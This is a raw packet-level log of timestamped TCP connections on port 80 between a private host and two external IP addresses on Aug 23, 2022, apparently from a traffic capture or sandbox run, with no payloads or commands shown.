Aug 23, 2022 18:24:03.550730944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.550749063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.550748110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.550770998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.550795078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.550796032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.550818920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.550825119 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.550836086 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.550848961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.550884962 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.582490921 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582520008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582544088 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582568884 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582597971 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582616091 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.582636118 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582659960 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582679987 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582695961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.582700014 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.582704067 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.582720995 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582745075 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582767963 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582791090 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582803965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.582808018 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.582811117 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.582834005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582854986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582874060 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.582879066 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.582881927 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.582896948 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582923889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.582950115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583008051 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583014965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583018064 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583045006 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583067894 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583091021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583113909 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583137035 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583157063 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583161116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583180904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583203077 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583225965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583231926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583235979 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583288908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583312035 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583334923 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583372116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583378077 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583403111 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583422899 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583444118 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583466053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583499908 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583503962 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583507061 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583517075 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583553076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583575010 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583600998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583619118 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583623886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583626986 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583641052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583664894 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583687067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583708048 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583730936 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583741903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583745956 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583750010 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583769083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583791971 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583811045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583815098 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583817959 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583833933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583859921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.583882093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583906889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583934069 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583941936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583946943 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583947897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.583950996 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.583973885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.583997011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584021091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.584032059 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584036112 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584038973 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584042072 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584063053 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.584075928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.584086895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584110022 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584120989 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.584135056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584152937 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584158897 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584175110 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584201097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584227085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.584244967 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584249973 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584253073 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584268093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584278107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.584291935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584316969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584342003 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584357023 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584362984 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584366083 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584388018 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584410906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.584435940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.584459066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584465981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.584486008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584491968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.584506989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584511995 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584515095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584528923 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584553957 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584578037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584594965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584599972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584603071 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584620953 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584642887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584666967 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584688902 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584693909 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584697962 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584709883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.584733963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.584758043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.584764004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.584780931 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584784985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.584805012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.584805012 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584827900 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584846020 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584851027 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584853888 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584867954 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584892988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584912062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.584930897 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584935904 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584939957 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.584954023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.584964037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585027933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.585056067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.585079908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.585098028 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.585103989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.585108042 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.585124016 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.585148096 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.585167885 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.585172892 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.585189104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.585212946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585241079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585258007 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.585274935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585282087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.585302114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585306883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.585330963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585346937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585366964 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.585371971 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.585392952 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.585403919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585417032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.585442066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.585459948 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.585464954 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.585479975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585520983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585532904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585546970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585572958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585577011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585597038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585597992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585622072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585625887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585643053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585647106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585669994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585674047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585692883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585692883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585710049 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.585720062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585742950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.585761070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.586605072 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.617947102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618010998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618036985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618058920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.618065119 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618097067 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.618107080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618118048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.618133068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618164062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.618221998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618242025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618272066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618284941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618300915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618316889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618405104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.618736982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620296955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620325089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620346069 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620369911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620378017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620392084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620400906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620414972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620439053 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620444059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620461941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620461941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620486021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620495081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620510101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620512962 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620533943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620538950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620553017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620568037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620589018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620590925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620609999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620614052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620655060 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620682001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.620831966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.620929003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.621124983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.621186972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.621311903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.621381044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.621553898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.621681929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.621839046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.621892929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.621918917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.621946096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.621953011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.621969938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.621983051 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.621995926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.622020006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.622021914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.622045040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.622060061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.622067928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.622085094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.622092962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.622103930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.622116089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.622126102 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.622138977 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.622144938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.622158051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.622168064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.622189045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.622216940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650142908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650171041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650192976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650216103 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650229931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650254011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650265932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650274038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650319099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650341034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650365114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650384903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650388002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650408983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650418043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650439978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650460958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650475979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650500059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650518894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650537014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650543928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650573969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650605917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650755882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650779963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.650851011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.650867939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.652539968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.652651072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.653456926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.653601885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653624058 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653641939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653660059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653678894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.653692961 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653704882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653717995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653733969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.653757095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:03.653781891 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:03.653801918 CEST	80	49827	45.95.11.158	192.168.2.3
